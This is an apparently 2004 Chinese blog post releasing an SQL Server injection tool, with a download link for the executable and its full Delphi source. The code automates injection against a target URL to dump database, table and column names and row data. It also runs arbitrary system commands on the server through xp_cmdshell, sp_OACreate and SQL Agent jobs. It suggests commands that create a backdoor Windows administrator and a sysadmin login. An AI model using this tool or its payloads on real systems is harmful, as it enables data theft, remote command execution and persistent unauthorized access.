SQL Server注入工具 1.0

类别:Delphi 点击:0 评论:0 推荐:

SQL Server注入工具 1.0

利用SQL Server的注入漏洞实现猜解数据库名,表名,字段名及记录的信息,由于网速的原因,目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令,同时可回显显示。

本程序只供测试研究使用,由此软件造成的后果一概不负责任,由于编写比较仓促,代码难免有纰漏之处,欢迎大家批评指正。

下载地址:http://free.efile.com.cn/hnxyy/NBSI.exe


作者:Hnxyy  QQ:19026695

 2004.12.16    北京


FireFox技术交流论坛
http://www.wrsky.com
临时访问地址
http://firefoxer.nease.net
It is all beginnings free
It is all ruin to be privately owned


D7原代码:

unit untmain;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, OleCtrls, SHDocVw,mshtml;

type
  TForm1 = class(TForm)
    Label1: TLabel;
    EdtUrl: TEdit;
    BtnCheck: TButton;
    Label2: TLabel;
    GroupBox1: TGroupBox;
    Label7: TLabel;
    Label3: TLabel;
    Label4: TLabel;
    Label5: TLabel;
    Label6: TLabel;
    EdtMuliCase: TEdit;
    EdtQuery: TEdit;
    EdtUser: TEdit;
    EdtPower: TEdit;
    EdtDbName: TEdit;
    Memo1: TMemo;
    GroupBox2: TGroupBox;
    cbDisp: TCheckBox;
    EdtCommand: TEdit;
    rbCmd: TRadioButton;
    rbOA: TRadioButton;
    BtnExecute: TButton;
    GroupBox3: TGroupBox;
    Memo2: TMemo;
    wb: TWebBrowser;
    BtnStop: TButton;
    rbJob: TRadioButton;
    BtnCancel: TButton;
    procedure BtnCheckClick(Sender: TObject);
    procedure BtnExecuteClick(Sender: TObject);
    procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;
      var URL: OleVariant);
    procedure BtnStopClick(Sender: TObject);
    procedure rbCmdClick(Sender: TObject);
    procedure rbOAClick(Sender: TObject);
    procedure rbJobClick(Sender: TObject);
    procedure FormShow(Sender: TObject);
    procedure BtnCancelClick(Sender: TObject);
  private
    { Private declarations }
    tag:integer;
    isFinish,isCancel:boolean;
    function Get(URL: string): boolean;
    function GetWBMsg(URL: string): string;
    Function StrToNChar(DbName,TName:string): string;
    procedure SetRdbCheck(rd:TRadioButton);
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.BtnCheckClick(Sender: TObject);
const
  vFieldCount=5;
  PowerStr :array[0..6] of string=(
     'sysadmin','dbcreator','diskadmin',
     'processadmin','serveradmin',
     'setupadmin','securityadmin');
var
  Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;
  i,j,k,iCount:integer;
  VerStr,ValueStr,CountStr,Powers:string;
  FieldStr,FieldOrdStr,CFieldStr:string;
  vfield:OleVariant;
begin
  try
    EdtMuliCase.Text :='';
    EdtQuery.Text :='';
    EdtUser.Text :='';
    EdtPower.Text :='';
    EdtDbName.Text :='';
    Url:=trim(EdtUrl.Text);
    isFinish :=False;
    vfield :=VarArrayCreate([0,vFieldCount-1],varVariant);
    Memo1.Clear;
    Screen.Cursor :=crHourGlass;
    //判断是否支持多句查询
    if Get(Url+';declare%20@a%20int--') then
    begin
      EdtMuliCase.Text :='支持';
    end else
    begin
      EdtMuliCase.Text :='不支持';
    end;
    //判断是否支持子查询
    if get(Url+'%20and%20(Select%20count(1)%20from%20[sysobjects])>=0') then
    begin
      EdtQuery.Text :='支持';
    end else
    begin
      EdtQuery.Text :='不支持';
    end;
    //取得当前用户
    EdtUser.Text :=GetWBMsg(Url+'%20and%20char(124)%2Buser%2Bchar(124)=0');
    //取得当前用户登录的服务器角色成员
    for i:=0 to High(PowerStr) do
    begin
      if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER('''+PowerStr[i]+''')%20as%20varchar(1))=1') then
      begin
        Powers :=Powers+PowerStr[i]+'|';
      end;
    end;
    if Powers='' then
      EdtPower.Text :='未知'
    else EdtPower.Text :=Powers;
    //指明当前用户是否为 db_owner 固定数据库角色的成员
  {  if get(Url+'%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20varchar(1))=1') then
    begin
      EdtPower.Text :='db_owner';
    end else
    begin
      EdtPower.Text :='未知';
    end;  }
    //得到当前SQL Server的版本号
    VerStr :=GetWBMsg(Url+'%20and%20char(124)%2B@@version%2Bchar(124)>0');
    Memo1.Lines.Add('当前版本号:'+VerStr);
    Memo1.Lines.Add('');
    //取得数据库名
    DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');
    EdtDbName.Text :=DbName;
    if (DbName='') or (DbName='未知') then
    begin
      Memo1.Lines.Add('未知的数据库,操作终止!');
      exit;
    end;
    Memo1.Lines.Add('当前数据库:'+DbName);
    BtnStop.Visible :=true;
    BtnCheck.Visible :=False;
    //猜解表名
    Memo1.Lines.Add('');
    Memo1.Lines.Add('开始猜解表名.....');
    Memo1.Lines.Add('#######################');
    for i:=1 to 1000 do
    begin
      TName :='';
      TName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)%20as%20varchar(8000))'+
                       '%20from(Select%20Top%20'+inttostr(i)+'%20id,name%20from%20['+DbName+']..[sysobjects]'+
                       '%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0;--');
      if (TName0=TName) or (isFinish) then
        Break;
      Memo1.Lines.Add('表名 :'+TName);
      //猜解列名
      Memo1.Lines.Add('');
      Memo1.Lines.Add('开始猜解列名.....');
      Memo1.Lines.Add('#######################');
      NCharStr :='';
      NCharStr :=StrToNChar(DbName,TName);
      j:=1;
      while j<1000 do
      begin
        ColName :='';
        ColName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)'+
                       '%20as%20varchar(8000))%20from%20(Select%20Top%20'+inttostr(j)+'%20colid,name'+
                       '%20From%20['+DbName+']..[syscolumns]%20Where%20id%20=%20'+NCharStr+
                       '%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0;--');
        if (ColName0=ColName) or (isFinish) then
          j:=1000
        else begin
          Memo1.Lines.Add('列名 '+inttostr(j)+' :'+ColName);
          if j<vFieldCount+1 then
          begin
            vfield[j-1] :=ColName;
          end;
          ColName0 :=ColName;
          inc(j);
        end;
      end;
      Memo1.Lines.Add('#######################');
      Memo1.Lines.Add('列名猜解结束.....');
      Memo1.Lines.Add('');
      //猜解数据
      Memo1.Lines.Add('开始猜解数据.....');
      Memo1.Lines.Add('#######################');
      CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+
                   '%2Bchar(124)%20From%20['+TName+']%20Where%201=1)>0;--');
      try
        iCount :=strtoint(CountStr);
      except
        Memo1.Lines.add('出现意外数据,操作终止!');
        exit;
      end;
      Memo1.Lines.Add('表 '+TName+' :共有 '+CountStr+' 条数据。');
      CFieldStr :='';
      FieldStr :='';
      FieldOrdStr :='';
      for k:=0 to vFieldCount-1 do
      begin
        if k=0 then
        begin
          CFieldStr :='isNull(cast(['+vfield[0]+']%20as%20varchar(8000)),char(32))';
          FieldStr :='['+vfield[0]+']';
          FieldOrdStr :='['+vfield[0]+']%20desc';
        end else
        begin
          CFieldStr :=CFieldStr+'%2B%20%2BisNull(cast(['+vfield[k]+']%20as%20varchar(8000)),char(32))';
          FieldStr :=FieldStr+',['+vfield[k]+']';
          FieldOrdStr :=FieldOrdStr+',['+vfield[k]+']%20desc';
        end;
      end;
      k:=1;
      while k<iCount+1 do
      begin
        ValueStr :='';
        ValueStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20char(124)%2B'+CFieldStr+'%2Bchar(124)%20From%20(Select'+
                   '%20Top%20'+inttostr(k)+'%20'+FieldStr+'%20From%20['+DbName+']..['+TName+']%20Where%201=1'+
                   '%20Order%20by%20'+FieldStr+')%20T%20Order%20by%20'+FieldOrdStr+')>0;--');

        if isFinish then
          k:=iCount+1;
        Memo1.Lines.Add('数据 '+inttostr(k)+' :'+ValueStr);
        inc(k);
      end;
      Memo1.Lines.Add('#######################');
      Memo1.Lines.Add('数据猜解结束.....');       
      Memo1.Lines.Add('');
      TName0 :=TName;
    end;
    Memo1.Lines.Add('#######################');
    Memo1.Lines.Add('表名猜解结束.....');
  finally
    Screen.Cursor :=crDefault;
    BtnStop.Visible :=False;
    BtnCheck.Visible :=True;
  end;
end;

procedure TForm1.BtnExecuteClick(Sender: TObject);
var
  Url,DbName,CommandStr:string;
  ResultStr,CountStr:string;
  iCount,i:integer;
begin
  try
    Url:=trim(EdtUrl.Text);
    ResultStr :='';
    CommandStr :='';
    isCancel :=False;
    CommandStr:=trim(EdtCommand.Text);
    CommandStr:=StringReplace(CommandStr,'%','%25',[rfReplaceAll]);
    CommandStr:=StringReplace(CommandStr,' ','%20',[rfReplaceAll]);
    Memo2.Clear;
    Screen.Cursor :=crHourGlass;
    //取得数据库名
    DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');
    if (DbName='') or (DbName='未知') then
    begin
      Memo2.Lines.Add('未知的数据库,操作终止!');
      exit;
    end;
    //Cmd_shell
    //使用xp_cmdshell来运行系统命令
    if rbCmd.Checked then
    begin
      //回显
      if cbDisp.Checked then
      begin
        BtnCancel.Visible :=true;
        BtnExecute.Visible :=False;
        //第一种办法
        //把命令执行的结果保存到一个本地文件中,然后将此文件的内容写入到新建的临时表进行输出
        {CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'>C:\Command_Tmp.log'''+
                        ';DROP%20TABLE%20[Command_Tmp]'+
                        ';CREATE%20TABLE%20[Command_Tmp]([ResultTxt]%20varchar(7996)%20NULL)'+
                        ';BULK%20INSERT%20['+DbName+']..[Command_Tmp]%20FROM%20''C:\Command_Tmp.log''%20WITH%20(KEEPNULLS)'+
                        ';Alter%20Table%20[Command_Tmp]%20add%20[ID]%20int%20NOT%20NULL%20IDENTITY%20(1,1)--'; }

        //第二种办法,直接把命令执行的结果写入数据库中输出,效率较高
        CommandStr :=Url+';DROP%20TABLE%20[Command_Tmp];'+
                         'CREATE%20TABLE%20[Command_Tmp]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),'+
                         '%20[ResultTxt]%20varchar(1024)%20NULL);'+
                         'insert%20into%20[Command_Tmp](ResultTxt)%20EXEC%20MASTER..XP_CMDSHELL%20'''+
                         CommandStr+''';insert%20into%20[Command_Tmp]%20values%20(''g_over'')--';

        if Get(CommandStr) then
        begin
          CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+
                        '%2Bchar(124)%20From%20[Command_Tmp]%20Where%201=1)>0;--');
          try
            iCount :=strtoint(CountStr);
          except
            Memo2.Lines.add('出现意外数据,操作终止!');
            exit;
          end;
          for i:=1 to iCount do
          begin
            ResultStr :='';
            ResultStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null'+
                          '%20then%20char(32)%20else%20char(124)%2BResultTxt%2Bchar(124)'+
                          '%20End%20From%20[Command_Tmp]%20Where%20ID='+IntToStr(i)+')=0;--');
            if isCancel then
              Break;
            if (ResultStr<>'') and (ResultStr<>'未知') then
              Memo2.Lines.Add(ResultStr);
          end;
        end;
        if Get(Url+';DROP%20TABLE%20[Command_Tmp]--') then
        begin
          Memo2.Lines.Add('命令执行完成');
        end;
      end else
      begin
        CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'''--';
        if get(CommandStr) then
          Memo2.Lines.Add('命令执行完成。');
      end;
    end;
   //OAcreate
   //使用sp_OACreate来运行系统命令
    if rbOA.Checked then
    begin
      //指明当前用户是否为 sysadmin 固定服务器角色的成员
      if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))=1') then
      begin
        CommandStr :=Url+';use%20'+DbName+';declare%20@o%20int;exec%20'+
                         'sp_oacreate%20''wscript.shell'',@o%20out;exec%20'+
                         'sp_oamethod%20@o,''run'',NULL,''cmd%20/c%20'+
                         CommandStr+'''--';
        if Get(CommandStr) then
          Memo2.Lines.Add('命令执行完成。');
      end else
      begin
        Memo2.Lines.Add('只有 sysadmin 固定服务器角色的成员才能执行 sp_OACreate。');
        exit;
      end;
    end;
    //Job
    //使用SQLSERVERAGENT的JOB来运行系统命令
    if rbJob.Checked then
    begin
      //启动SQLSERVERAGENT
      if Get(Url+';exec%20master..xp_servicecontrol%20''start'',''SQLSERVERAGENT'';--') then
      begin
        Memo2.Lines.Add('SQLSERVERAGENT 启动成功!');
        CommandStr :=Url+';use%20'+DbName+';exec%20sp_delete_job%20null,''x'''+
                         ';exec%20sp_add_job%20''x'''+
                         ';exec%20sp_add_jobstep%20Null,''x'',Null,''1'',''CMDEXEC'',''cmd%20/c%20'+
                         CommandStr+''';exec%20sp_add_jobserver%20Null,''x'',@@servername'+
                         ';exec%20sp_start_job%20''x''--';
        if get(CommandStr) then
          Memo2.Lines.Add('命令执行完成。');
      end else
      begin
        Memo2.Lines.Add('SQLSERVERAGENT 启动失败,操作终止!');
        exit;
      end;
    end;
  finally
    Screen.Cursor :=crDefault;
    BtnExecute.Visible :=true;
    BtnCancel.Visible :=false;
  end;
end;

function TForm1.Get(URL: string): boolean;
var
  IDHTTP: TIDHttp;
  ss: String;
begin
  Result:= False;
  IDHTTP:= TIDHTTP.Create(nil);
  try
    try
      idhttp.HandleRedirects:= true;                //必须支持重定向否则可能出错
      idhttp.ReadTimeout:= 30000;                   //超过这个时间则不再访问
      ss:= IDHTTP.Get(URL);
      if IDHTTP.ResponseCode=200 then
        Result :=true;
    except
      //on E: Exception do
      //  Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
    end;
  finally
    IDHTTP.Free;
  end;
end;

function TForm1.GetWBMsg(URL: string): string;
  function GetResultStr(str:string):string;
  var
    istart,iend:integer;
    ss:string;
  begin
    istart:=pos('|',str);
    if istart>0 then
    begin
      ss:=copy(str,istart+1,length(str)-istart);
      iend :=pos('|',ss);
      if iend>0 then
      begin
        ss:=copy(ss,1,iend-1);
      end;
    end;
    if ss='' then
      Result :='未知'
    else Result :=ss;
  end;
var
  ss:string;
begin
  tag:=0;
  wb.Navigate(URL);
  while (tag=0) do
    Application.ProcessMessages;
  ss :=(wb.Document as IHTMLDocument2).Body.innerText;
  Result :=GetResultStr(ss);
end;

function TForm1.StrToNChar(DbName, TName: string): string;
var
  i:integer;
  ss,str:string;
begin
  ss:=DbName+'..'+TName;
  for i:=1 to length(ss) do
  begin
    if i=1 then
      str :='NCHAR('+inttostr(ord(ss[i]))+')'
    else
      str :=str+'%2BNCHAR('+inttostr(ord(ss[i]))+')';
  end;
  Result :='OBJECT_ID('+str+')';
end;

procedure TForm1.wbDocumentComplete(Sender: TObject;
  const pDisp: IDispatch; var URL: OleVariant);
begin
  //Memo2.Text :=(wb.Document as IHTMLDocument2).Body.innerText;
  tag:=1;
end;

procedure TForm1.BtnStopClick(Sender: TObject);
begin
  isFinish :=True;
  BtnCheck.Visible :=true;
  BtnStop.Visible :=False;
end;

procedure TForm1.SetRdbCheck(rd: TRadioButton);
begin
  Memo2.Clear;
  if rd=rbCmd then
  begin
    cbDisp.Enabled :=True;
    Memo2.Lines.Add('使用xp_cmdshell来运行系统命令');
    Memo2.Lines.Add('');
    Memo2.Lines.Add('net user test test /add');
    Memo2.Lines.Add('net localgroup administrators test /add');
    Memo2.Lines.Add('exec master..sp_addlogin test,test');
    Memo2.Lines.Add('exec master..sp_addsrvrolemember test,sysadmin');
  end;
  if rd=rbOA then
  begin
    cbDisp.Enabled :=False;
    Memo2.Lines.Add('使用sp_OACreate来运行系统命令');
  end;
  if rd=rbJob then
  begin
    cbDisp.Enabled :=False;
    Memo2.Lines.Add('使用SQLSERVERAGENT的JOB来运行系统命令');
    Memo2.Lines.Add('请先使用下列语句启动SQLSERVERAGENT:');
    Memo2.Lines.Add('');
    Memo2.Lines.Add('http://x.com/x.asp?a=1;exec master..xp_servicecontrol ''start'',''SQLSERVERAGENT'';--');
  end;
end;

procedure TForm1.rbCmdClick(Sender: TObject);
begin
  SetRdbCheck(rbcmd);
end;

procedure TForm1.rbOAClick(Sender: TObject);
begin
  SetRdbCheck(rbOA);
end;

procedure TForm1.rbJobClick(Sender: TObject);
begin
  SetRdbCheck(rbJob);
end;

procedure TForm1.FormShow(Sender: TObject);
begin
  SetRdbCheck(rbcmd);
end;

procedure TForm1.BtnCancelClick(Sender: TObject);
begin
  isCancel :=True;
  BtnExecute.Visible :=true;
  BtnCancel.Visible :=false;
end;

end.

本文地址:http://com.8s8s.com/it/it4487.htm